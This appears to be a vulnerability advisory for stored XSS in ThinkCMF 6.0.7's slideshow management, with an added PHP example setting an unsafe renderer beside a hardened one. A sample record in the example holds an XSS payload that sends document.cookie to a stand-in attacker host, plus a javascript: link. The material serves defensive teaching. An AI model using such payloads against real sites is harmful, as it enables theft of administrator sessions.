ThinkCMF version 6.0.7 is affected by Stored Cross-Site Scripting (XSS). An attacker who successfully exploits this vulnerability can inject a persistent XSS payload into the Slideshow Management section; the payload is stored and executes arbitrary JavaScript on the client side whenever the affected page is viewed, e.g., to steal the administrator's PHP session token (PHPSESSID).
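The pattern behind this class of bug, shown as an added example that is not ThinkCMF's own code: a hypothetical slideshow-item renderer (`renderSlideUnsafe`, `renderSlide`, `safeUrl`, the `$slide` record and the `attacker.example` host are all invented for illustration) that concatenates stored fields straight into HTML, beside a hardened version that encodes every field at output time and restricts link schemes, plus the session-cookie setting that keeps `document.cookie` from exposing PHPSESSID. It assumes PHP 7.3 or later for the array form of `session_set_cookie_params`.

```php
<?php
// Added example, not code from ThinkCMF: a hypothetical slideshow renderer in
// its vulnerable and hardened forms. Names and sample data are constructed.
declare(strict_types=1);

// Vulnerable: fields saved from the admin's slideshow form are concatenated
// straight into markup, so a stored payload runs in every viewer's browser.
function renderSlideUnsafe(array $slide): string
{
    return '<a href="' . $slide['url'] . '">'
         . '<img src="' . $slide['image'] . '" alt="' . $slide['title'] . '">'
         . '</a>';
}

// Encode a value for an HTML text node or a double-quoted attribute value.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Attribute encoding alone does not neutralise javascript: URLs in href/src,
// so only http(s) and site-relative paths are allowed; anything else becomes "#".
function safeUrl(string $url): string
{
    $url = trim($url);
    if (preg_match('#^(https?://|/)#i', $url) && !preg_match('#^//#', $url)) {
        return $url;
    }
    return '#';
}

// Hardened: every stored field is encoded at the point of output.
function renderSlide(array $slide): string
{
    return '<a href="' . e(safeUrl($slide['url'])) . '">'
         . '<img src="' . e(safeUrl($slide['image'])) . '" alt="' . e($slide['title']) . '">'
         . '</a>';
}

// Constructed sample record (hypothetical, not taken from the advisory): the
// kind of input a stored-XSS test would submit through the slideshow form.
$slide = [
    'title' => '"><script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
    'url'   => 'javascript:alert(document.cookie)',
    'image' => '/upload/banner.jpg',
];

// Unsafe output: the <script> element and the javascript: link land in the page verbatim.
echo renderSlideUnsafe($slide), PHP_EOL;
// Hardened output: the payload is rendered as inert text and the href is replaced by "#".
echo renderSlide($slide), PHP_EOL;

// Defence in depth: with HttpOnly set, document.cookie no longer returns the
// session id even if another injection point exists. Must run before session_start().
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
```

The encoding step belongs in the template that prints the slide, not in the save handler: escaping on input is easy to bypass through a second entry point and corrupts legitimate data. The cookie flag is a mitigation, not a fix; an attacker who can run script in the admin's session can still issue authenticated requests directly.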
| Package (Ecosystem) | Introduced | Fixed | Limit |
|---|---|---|---|
| thinkcmf/thinkcmf (Packagist) | 0 | 6.0.8 | N/A |
CVSS Metrics